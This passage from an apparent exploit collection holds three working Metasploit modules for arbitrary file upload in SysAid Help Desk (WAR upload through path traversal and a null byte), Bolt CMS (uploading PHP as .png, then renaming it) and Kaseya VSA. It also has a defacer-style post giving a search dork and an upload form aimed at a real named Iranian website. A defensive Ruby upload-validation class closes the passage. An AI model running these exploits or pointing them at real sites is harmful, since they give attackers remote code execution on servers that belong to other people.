          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt' ],
          [ 'URL', 'http://seclists.org/fulldisclosure/2015/Jun/8' ]
        ],
      'DefaultOptions' => { 'WfsDelay' => 30 },
      'Privileged'     => false,
      'Platform'       => 'java',
      'Arch'           => ARCH_JAVA,
      'Targets'        =>
        [
          [ 'SysAid Help Desk v14.3 - 14.4 / Java Universal', { } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jun 3 2015'))

    register_options(
      [
        Opt::RPORT(8080),
        OptInt.new('SLEEP', [true, 'Seconds to sleep while we wait for WAR deployment', 15]),
        OptString.new('TARGETURI', [true, 'Base path to the SysAid application', '/sysaid/'])
      ], self.class)
  end

  def check
    servlet_path = 'rdslogs'
    bogus_file = rand_text_alphanumeric(4 + rand(32 - 4))
    res = send_request_cgi({
      'uri'      => normalize_uri(datastore['TARGETURI'], servlet_path),
      'method'   => 'POST',
      'vars_get' => { 'rdsName' => bogus_file }
    })

    if res && res.code == 200
      return Exploit::CheckCode::Detected
    end

    # Fall through to a definite answer instead of returning nil
    Exploit::CheckCode::Safe
  end

  def exploit
    app_base = rand_text_alphanumeric(4 + rand(32 - 4))
    tomcat_path = '../../../../'
    servlet_path = 'rdslogs'

    # We need to create the upload directories before our first attempt to upload the WAR.
    print_status("#{peer} - Creating upload directory")
    bogus_file = rand_text_alphanumeric(4 + rand(32 - 4))
    send_request_cgi({
      'uri'      => normalize_uri(datastore['TARGETURI'], servlet_path),
      'method'   => 'POST',
      'data'     => Zlib::Deflate.deflate(rand_text_alphanumeric(4 + rand(32 - 4))),
      'ctype'    => 'application/xml',
      'vars_get' => { 'rdsName' => bogus_file }
    })

    war_payload = payload.encoded_war({ :app_name => app_base }).to_s

    # We have to use the Zlib deflate routine as the Metasploit Zip API seems to fail
    print_status("#{peer} - Uploading WAR file...")
    res = send_request_cgi({
      'uri'      => normalize_uri(datastore['TARGETURI'], servlet_path),
      'method'   => 'POST',
      'data'     => Zlib::Deflate.deflate(war_payload),
      'ctype'    => 'application/octet-stream',
      'vars_get' => { 'rdsName' => "#{tomcat_path}/tomcat/webapps/#{app_base}.war\x00" }
    })

    # The server returns a 200 OK when the upload is successful.
    if res && res.code == 200
      print_status("#{peer} - Upload appears to have been successful, waiting #{datastore['SLEEP']} seconds for deployment")
      register_files_for_cleanup("tomcat/webapps/#{app_base}.war")
    else
      fail_with(Failure::Unknown, "#{peer} - WAR upload failed")
    end

    10.times do
      select(nil, nil, nil, 2)

      # Now make a request to trigger the newly deployed war
      print_status("#{peer} - Attempting to launch payload in deployed WAR...")
      res = send_request_cgi({
        'uri'    => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8) + 8)),
        'method' => 'GET'
      })

      # Failure. The request timed out or the server went away.
      break if res.nil?
      # Success! Triggered the payload, should have a shell incoming
      break if res.code == 200
    end
  end
end
23.

##########################################
# Exploit Title : IRan site wordpress Arbitrary File Upload
# Dork : inurl:/plupload/ -inurl:(php) intitle:index of site:ir
# Date : 2018
# Exploit Author: anonysec
# Category: Webapps
# Language: PHP
# Tested on: windows 10 / FireFox
# myteam: https://anonysec.org/

Info :
______________________________________________________________________
# view : https://www.ariarockwool.ir/wp-includes/js/
# Test Upload : https://www.ariarockwool.ir/wp-includes/js/plupload/l/media/vendor/plupload/examples/upload.php
______________________________________________________________________
# Tools :

<!DOCTYPE html>
<html>
<body>
<form action="https://www.ariarockwool.ir/wp-includes/js/plupload/upload.php" method="post" enctype="multipart/form-data">
  <input type="file" name="file" id="file">
  <input type="submit" value="Upload" name="submit">
</form>
</body>
</html>
______________________________________________________________________
# Discovered by : Rednofozi
# --tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow
http://www.exploit4arab.org/exploits/1978
24.

##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(
      info,
      'Name'           => 'CMS Bolt File Upload Vulnerability',
      'Description'    => %q{
        Bolt CMS contains a flaw that allows an authenticated remote
        attacker to execute arbitrary PHP code. This module was
        tested on version 2.2.4.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Tim Coen', # Vulnerability Disclosure
          'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module
        ],
      'References'     =>
        [
          ['URL', 'http://blog.curesec.com/article/blog/Bolt-224-Code-Execution-44.html']
        ],
      'DisclosureDate' => 'Aug 17 2015',
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['Bolt 2.2.4', {}]],
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to the web application', '/']),
        OptString.new('FOLDERNAME', [true, 'The theme path to the web application (default: base-2014)', 'base-2014']),
        OptString.new('USERNAME', [true, 'The username to authenticate with']),
        OptString.new('PASSWORD', [true, 'The password to authenticate with'])
      ], self.class)
  end

  def check
    cookie = bolt_login(username, password)
    return Exploit::CheckCode::Detected unless cookie

    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, 'bolt'),
      'cookie' => cookie
    )

    if res && res.code == 200 && res.body.include?('Bolt 2.2.4</b>: Sophisticated, lightweight & simple CMS')
      return Exploit::CheckCode::Vulnerable
    end

    Exploit::CheckCode::Safe
  end

  def username
    datastore['USERNAME']
  end

  def password
    datastore['PASSWORD']
  end

  def fname
    datastore['FOLDERNAME']
  end

  def bolt_login(user, pass)
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, 'bolt', 'login')
    )

    fail_with(Failure::Unreachable, 'No response received from the target.') unless res

    session_cookie = res.get_cookies
    vprint_status("#{peer} - Logging in...")

    res = send_request_cgi(
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, 'bolt', 'login'),
      'cookie'    => session_cookie,
      'vars_post' => {
        'username' => user,
        'password' => pass,
        'action'   => 'login'
      }
    )

    return res.get_cookies if res && res.code == 302 && res.redirection.to_s.include?('/bolt')
    nil
  end

  def get_token(cookie, fname)
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, 'bolt', 'files', 'theme', fname),
      'cookie' => cookie
    )

    # Non-greedy match so the capture stops at the closing quote of the token value
    if res && res.code == 200 && res.body =~ /name="form\[_token\]" value="(.+?)"/
      return Regexp.last_match[1]
    end

    nil
  end

  def rename_payload(cookie, payload, fname)
    res = send_request_cgi(
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, 'async', 'renamefile'),
      'vars_post' => {
        'namespace' => 'theme',
        'parent'    => fname,
        'oldname'   => "#{payload}.png",
        'newname'   => "#{payload}.php"
      },
      'cookie'    => cookie
    )

    return true if res && res.code == 200 && res.body.include?('1')
    nil
  end

  def exploit
    vprint_status("#{peer} - Authenticating using #{username}:#{password}")
    cookie = bolt_login(username, password)
    fail_with(Failure::NoAccess, 'Unable to login. Verify USERNAME/PASSWORD or TARGETURI.') if cookie.nil?
    vprint_good("#{peer} - Authenticated with Bolt.")

    token = get_token(cookie, fname)
    fail_with(Failure::Unknown, 'No token found.') if token.nil?
    vprint_good("#{peer} - Token \"#{token}\" found.")

    vprint_status("#{peer} - Preparing payload...")
    payload_name = Rex::Text.rand_text_alpha_lower(10)

    data = Rex::MIME::Message.new
    data.add_part(payload.encoded, 'image/png', nil, "form-data; name=\"form[FileUpload][]\"; filename=\"#{payload_name}.png\"")
    data.add_part("#{token}", nil, nil, 'form-data; name="form[_token]"')
    post_data = data.to_s

    vprint_status("#{peer} - Uploading payload...")
    res = send_request_cgi(
      'method' => 'POST',
      'uri'    => normalize_uri(target_uri.path, 'bolt', 'files', 'theme', fname),
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data,
      'cookie' => cookie
    )

    fail_with(Failure::Unknown, 'Unable to upload payload.') unless res && res.code == 302
    vprint_good("#{peer} - Uploaded the payload.")

    rename = rename_payload(cookie, payload_name, fname)
    fail_with(Failure::Unknown, 'No renamed filename.') if rename.nil?

    php_file_name = "#{payload_name}.php"
    payload_url = normalize_uri(target_uri.path, 'theme', fname, php_file_name)

    vprint_status("#{peer} - Parsed response.")
    register_files_for_cleanup(php_file_name)

    vprint_status("#{peer} - Executing the payload at #{payload_url}.")
    send_request_cgi(
      'uri'    => payload_url,
      'method' => 'GET'
    )
  end
end
25.

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Kaseya VSA uploader.aspx Arbitrary File Upload',
      'Description'    => %q{
        This module exploits an arbitrary file upload vulnerability found in Kaseya VSA versions
        between 7 and 9.1. A malicious unauthenticated user can upload an ASP file to an arbitrary
        directory leading to arbitrary code execution with IUSR privileges. This module has been
        tested with Kaseya v7.0.0.17, v8.0.0.10 and v9.0.0.3.
      },
      'Author'         =>
        [
          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and updated MSF module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2015-6922'],
          ['ZDI', '15-449'],
          ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/kaseya-vsa-vuln-2.txt'],
          ['URL', 'http://seclists.org/bugtraq/2015/Sep/132']
        ],
      'Platform'       => 'win',
      'Arch'           => ARCH_X86,
      'Privileged'     => false,
      'Targets'        =>
        [
          [ 'Kaseya VSA v7 to v9.1', {} ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Sep 23 2015'))
  end

  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri('ConfigTab', 'uploader.aspx')
    })

    if res && res.code == 302 && res.body && res.body.to_s =~ /mainLogon\.asp\?logout=([0-9]*)/
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Unknown
    end
  end

  def upload_file(payload, path, filename, session_id)
    print_status("#{peer} - Uploading payload to #{path}...")
    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri('ConfigTab', 'uploader.aspx'),
      'vars_get' => {
        'PathData' => path,
        'qqfile'   => filename
      },
      'data'     => payload,
      'ctype'    => 'application/octet-stream',
      'cookie'   => 'sessionId=' + session_id
    })

    if res && res.code == 200 && res.body && res.body.to_s.include?('"success": "true"')
      return true
    else
      return false
    end
  end

  def exploit
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri('ConfigTab', 'uploader.aspx')
    })

    if res && res.code == 302 && res.body && res.body.to_s =~ /mainLogon\.asp\?logout=([0-9]*)/
      session_id = $1
    else
      fail_with(Failure::NoAccess, "#{peer} - Failed to create a valid session")
    end

    asp_name = "#{rand_text_alpha_lower(8)}.asp"
    exe = generate_payload_exe
    payload = Msf::Util::EXE.to_exe_asp(exe).to_s

    paths = [
      # We have to guess the path, so just try the most common directories
      'C:\\Kaseya\\WebPages\\',
      'C:\\Program Files\\Kaseya\\WebPages\\',
      'C:\\Program Files (x86)\\Kaseya\\WebPages\\',
      'D:\\Kaseya\\WebPages\\',
      'D:\\Program Files\\Kaseya\\WebPages\\',
      'D:\\Program Files (x86)\\Kaseya\\WebPages\\',
      'E:\\Kaseya\\WebPages\\',
      'E:\\Program Files\\Kaseya\\WebPages\\',
      'E:\\Program Files (x86)\\Kaseya\\WebPages\\',
    ]

    paths.each do |path|
      if upload_file(payload, path, asp_name, session_id)
        register_files_for_cleanup(path + asp_name)
        print_status("#{peer} - Executing payload #{asp_name}")
        # Keep this response: the break conditions below must inspect the trigger
        # request, not the earlier session GET that was still held in res.
        res = send_request_cgi({
          'uri'    => normalize_uri(asp_name),
          'method' => 'GET'
        })

        # Failure. The request timed out or the server went away.
        break if res.nil?
        # Success! Triggered the payload, should have a shell incoming
        break if res.code == 200
      end
    end
  end
end
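The three Metasploit modules above (SysAid rdslogs, Bolt CMS, Kaseya VSA uploader.aspx) share one root cause: the upload handler lets the client influence where or under what name a file is written. SysAid accepted `../` segments and a trailing null byte in rdsName, Kaseya took the destination directory straight from PathData, and Bolt checked the extension on upload but not on the later rename from .png to .php. The following Ruby class is an added defensive example, not code from any of these posts, from Metasploit or from the affected vendors, showing the server-side checks that close all three patterns. The class name UploadPolicy, the base directory /srv/uploads and the extension allowlist are assumptions chosen for the example; it never touches the filesystem, it only decides whether a client-supplied name may be used.

```ruby
require 'pathname'

# Constructed example: a server-side guard for upload destinations.
# Apply it both when a file is first stored and when it is renamed, so the
# checks cannot be bypassed by uploading under a harmless name and renaming
# afterwards (the Bolt pattern). The server, not the client, picks the
# directory (the Kaseya pattern); the client only supplies a bare filename.
class UploadPolicy
  # Assumed allowlist for the example; a real deployment lists what it serves.
  ALLOWED_EXT = %w[.png .jpg .jpeg .gif .pdf .txt].freeze

  # Raised for any rejected name; a web handler maps it to an HTTP 400.
  class Rejected < StandardError; end

  def initialize(base_dir)
    # Resolved once; every accepted path must stay inside this directory.
    @base = Pathname.new(base_dir).expand_path
  end

  # Returns the absolute Pathname where the file may be written, or raises Rejected.
  # client_name is the untrusted filename (or the new name on rename) from the request.
  def resolve(client_name)
    name = client_name.to_s
    raise Rejected, 'empty name' if name.empty?
    # Older Java runtimes and most C APIs truncate at NUL (the SysAid pattern):
    # reject the name instead of letting a lower layer truncate it.
    raise Rejected, 'NUL byte in name' if name.include?("\x00")
    # A filename never contains a separator; this also rules out '../' and 'C:\' prefixes.
    raise Rejected, 'path separator in name' if name =~ %r{[/\\]}
    raise Rejected, 'dot segment' if name == '.' || name == '..'
    raise Rejected, 'control characters' if name =~ /[[:cntrl:]]/

    ext_raw = File.extname(name)          # '' for '.htaccess' and for names with no dot
    ext = ext_raw.downcase
    raise Rejected, "extension #{ext.inspect} not allowed" unless ALLOWED_EXT.include?(ext)
    # Exactly one extension: 'shell.php.png' is rejected even though '.png' is allowed.
    raise Rejected, 'multiple extensions' if File.basename(name, ext_raw).include?('.')

    target = (@base + name).expand_path
    # Belt and braces: after all the checks above, still confirm containment.
    raise Rejected, 'escapes base directory' unless target.to_s.start_with?(@base.to_s + File::SEPARATOR)
    target
  end

  # Boolean form of resolve for callers that only need an accept/reject decision.
  def allowed?(client_name)
    resolve(client_name)
    true
  rescue Rejected
    false
  end
end

if __FILE__ == $PROGRAM_NAME
  policy = UploadPolicy.new('/srv/uploads')
  # Constructed sample names, modelled on the inputs the modules above send.
  samples = [
    'report.pdf',
    "../../../../tomcat/webapps/app.war\x00",
    'shell.php',
    'shell.php.png',
    'C:\\Kaseya\\WebPages\\x.asp'
  ]
  samples.each do |n|
    begin
      puts "ACCEPT #{n.inspect} -> #{policy.resolve(n)}"
    rescue UploadPolicy::Rejected => e
      puts "REJECT #{n.inspect}: #{e.message}"
    end
  end
end
```

Run the same `resolve` call from both the upload and the rename endpoint; the rename check is the one most projects forget. Treating a name with any separator as an error, rather than stripping the directory part, also keeps the rejection visible in logs, which is where an attempted traversal is most useful to a defender.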